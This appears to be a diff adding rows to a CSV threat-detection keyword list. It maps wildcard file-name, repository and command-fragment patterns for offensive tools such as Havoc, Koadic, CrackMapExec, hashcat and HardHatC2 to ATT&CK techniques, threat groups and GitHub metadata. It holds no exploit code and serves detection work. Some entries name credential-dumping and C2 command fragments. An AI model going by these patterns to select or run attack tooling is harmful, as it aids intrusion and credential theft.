+"*HackTool:Win64*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
+"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
+"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
+"*Hack-with-Github*","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*hades_directsys.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*HadesLdr-main*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z"
+"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*hakrawler-ip-range*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*Hakumarachi/Bropper*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z"
+"*handelsregister-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*handlekatz.x64.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*handlekatz_bof.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,,
+"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Hangingsword/HouQing*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z"
+"*HardHatC2*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*hardhatc2.com*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*HardHatC2Client*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*HarmJ0y/DAMP*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
+"*harvestcrop.exe * *","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*HasAutoAdminLogonCredentials*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z"
+"*hash3liZer/SillyRAT*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z"
+"*hash3liZer/wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","168","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z"
+"*Hash-Buster*","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1543","392","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z"
+"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*hashdump_sam*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*HashDumpDCImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*HashDumpSAMImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos 
unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*hashonymize --ntds * --kerberoast *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*HashPals/Name-That-Hash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*--hash-type 1000 --potfile-path*.ntds.cracked*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*HasSPNNoPreauth*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z"
+"*hatlord/snmpwn*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z"
+"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
